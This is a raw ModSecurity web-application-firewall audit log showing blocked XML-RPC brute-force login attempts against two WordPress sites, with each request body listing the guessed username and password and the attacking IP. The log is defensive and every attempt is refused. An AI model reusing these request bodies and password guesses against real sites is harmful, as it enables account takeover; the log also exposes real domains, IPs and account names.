Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116906001671 4135 (- - -) Stopwatch2: 1749116906001671 4135; combined=3208, p1=338, p2=2707, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07f4f57-Z-- --b15acc23-A-- [05/Jun/2025:16:49:27 +0700] aEFoJ-th7G2xELALzPZTsAAAAMk 103.236.140.4 43794 103.236.140.4 8181 --b15acc23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b15acc23-C-- wp.getUsersBlogs wakasarpras jordan --b15acc23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b15acc23-E-- --b15acc23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116967452158 4245 (- - -) Stopwatch2: 1749116967452158 4245; combined=3310, p1=368, p2=2778, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b15acc23-Z-- --52655e66-A-- [05/Jun/2025:16:50:27 +0700] aEFoY-th7G2xELALzPZT5wAAAMs 103.236.140.4 43928 103.236.140.4 8181 --52655e66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --52655e66-C-- wp.getUsersBlogs wakasarpras 147258369 --52655e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52655e66-E-- --52655e66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117027231279 4701 (- - -) Stopwatch2: 1749117027231279 4701; combined=3371, p1=413, p2=2802, p3=0, p4=0, p5=92, sr=83, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52655e66-Z-- --956f6320-A-- [05/Jun/2025:16:50:49 +0700] aEFoeeth7G2xELALzPZUBQAAANg 103.236.140.4 44014 103.236.140.4 8181 --956f6320-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --956f6320-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh11111 --956f6320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --956f6320-E-- --956f6320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117049051960 2833 (- - -) Stopwatch2: 1749117049051960 2833; combined=2155, p1=229, p2=1823, p3=0, p4=0, p5=61, sr=50, sw=42, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --956f6320-Z-- --dc78ad2e-A-- [05/Jun/2025:16:51:37 +0700] aEFoqeth7G2xELALzPZUEAAAAM0 103.236.140.4 44116 103.236.140.4 8181 --dc78ad2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --dc78ad2e-C-- wp.getUsersBlogs wakasarpras welcome1 --dc78ad2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc78ad2e-E-- --dc78ad2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117097145904 5323 (- - -) Stopwatch2: 1749117097145904 5323; combined=3761, p1=485, p2=3106, p3=0, p4=0, p5=100, sr=110, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc78ad2e-Z-- --48467f3b-A-- [05/Jun/2025:16:52:32 +0700] aEFo4H-K7ToMdu-YSIJRygAAAAE 103.236.140.4 44326 103.236.140.4 8181 --48467f3b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --48467f3b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix!@#123 --48467f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48467f3b-E-- --48467f3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117152722192 4409 (- - -) Stopwatch2: 1749117152722192 4409; combined=3554, p1=368, p2=2920, p3=0, p4=0, p5=146, sr=76, sw=120, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48467f3b-Z-- --70c5b010-A-- [05/Jun/2025:16:52:37 +0700] aEFo5X-K7ToMdu-YSIJR0AAAABc 103.236.140.4 44340 103.236.140.4 8181 --70c5b010-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --70c5b010-C-- wp.getUsersBlogs wakasarpras qwertyui --70c5b010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c5b010-E-- --70c5b010-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117157845554 4485 (- - -) Stopwatch2: 1749117157845554 4485; combined=3360, p1=340, p2=2829, p3=0, p4=0, p5=109, sr=79, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c5b010-Z-- --7093cb37-A-- [05/Jun/2025:16:53:37 +0700] aEFpISrHpfaS2Cuwh8UE_gAAAEo 103.236.140.4 44510 103.236.140.4 8181 --7093cb37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7093cb37-C-- wp.getUsersBlogs wakasarpras 741852963 --7093cb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7093cb37-E-- --7093cb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117217072059 4844 (- - -) Stopwatch2: 1749117217072059 4844; combined=3410, p1=463, p2=2784, p3=0, p4=0, p5=95, sr=88, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7093cb37-Z-- --46d9f63b-A-- [05/Jun/2025:16:54:40 +0700] aEFpYOth7G2xELALzPZUfAAAANY 103.236.140.4 44692 103.236.140.4 8181 --46d9f63b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --46d9f63b-C-- wp.getUsersBlogs kasubagtu kasubagtu1991 --46d9f63b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46d9f63b-E-- --46d9f63b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117280812972 5161 (- - -) Stopwatch2: 1749117280812972 5161; combined=3719, p1=468, p2=3078, p3=0, p4=0, p5=102, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46d9f63b-Z-- --bca8c03d-A-- [05/Jun/2025:16:55:18 +0700] aEFphuth7G2xELALzPZUowAAAM4 103.236.140.4 44802 103.236.140.4 8181 --bca8c03d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bca8c03d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh67 --bca8c03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bca8c03d-E-- --bca8c03d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117318268916 4456 (- - -) Stopwatch2: 1749117318268916 4456; combined=3526, p1=382, p2=2979, p3=0, p4=0, p5=96, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bca8c03d-Z-- --3e66964c-A-- [05/Jun/2025:16:55:36 +0700] aEFpmH-K7ToMdu-YSIJSBAAAABA 103.236.140.4 44880 103.236.140.4 8181 --3e66964c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 158.220.81.196 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 158.220.81.196 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3e66964c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin1231 --3e66964c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e66964c-E-- --3e66964c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 158.220.81.196 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117336469017 4668 (- - -) Stopwatch2: 1749117336469017 4668; combined=3639, p1=394, p2=3020, p3=0, p4=0, p5=158, sr=102, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e66964c-Z-- --92f65456-A-- [05/Jun/2025:16:55:41 +0700] aEFpneth7G2xELALzPZUzwAAANM 103.236.140.4 44898 103.236.140.4 8181 --92f65456-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --92f65456-C-- wp.getUsersBlogs kasubagtu Marketing2015 --92f65456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92f65456-E-- --92f65456-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117341149832 4924 (- - -) Stopwatch2: 1749117341149832 4924; combined=3590, p1=443, p2=2976, p3=0, p4=0, p5=101, sr=95, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92f65456-Z-- --e1fff01a-A-- [05/Jun/2025:16:56:35 +0700] aEFp03-K7ToMdu-YSIJSBwAAABI 103.236.140.4 45006 103.236.140.4 8181 --e1fff01a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e1fff01a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix102030 --e1fff01a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1fff01a-E-- --e1fff01a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117395646318 5712 (- - -) Stopwatch2: 1749117395646318 5712; combined=4115, p1=490, p2=3452, p3=0, p4=0, p5=102, sr=102, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1fff01a-Z-- --d795415d-A-- [05/Jun/2025:16:56:41 +0700] aEFp2eth7G2xELALzPZVAAAAAMs 103.236.140.4 45014 103.236.140.4 8181 --d795415d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d795415d-C-- wp.getUsersBlogs kasubagtu kasubagtu@2003 --d795415d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d795415d-E-- --d795415d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117401280804 5058 (- - -) Stopwatch2: 1749117401280804 5058; combined=3641, p1=456, p2=3009, p3=0, p4=0, p5=104, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d795415d-Z-- --22376670-A-- [05/Jun/2025:16:57:41 +0700] aEFqFeth7G2xELALzPZVMwAAANU 103.236.140.4 45134 103.236.140.4 8181 --22376670-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --22376670-C-- wp.getUsersBlogs kasubagtu abc123456 --22376670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22376670-E-- --22376670-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117461365168 5353 (- - -) Stopwatch2: 1749117461365168 5353; combined=3750, p1=469, p2=3107, p3=0, p4=0, p5=103, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22376670-Z-- --b25b3506-A-- [05/Jun/2025:16:58:14 +0700] aEFqNuth7G2xELALzPZVOwAAAME 103.236.140.4 45208 103.236.140.4 8181 --b25b3506-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b25b3506-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2015! --b25b3506-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b25b3506-E-- --b25b3506-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117494738987 4880 (- - -) Stopwatch2: 1749117494738987 4880; combined=3651, p1=406, p2=3054, p3=0, p4=0, p5=113, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b25b3506-Z-- --b50d517b-A-- [05/Jun/2025:16:58:46 +0700] aEFqVuth7G2xELALzPZVWgAAAMg 103.236.140.4 45276 103.236.140.4 8181 --b50d517b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b50d517b-C-- wp.getUsersBlogs kasubagtu loginadmin --b50d517b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b50d517b-E-- --b50d517b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity 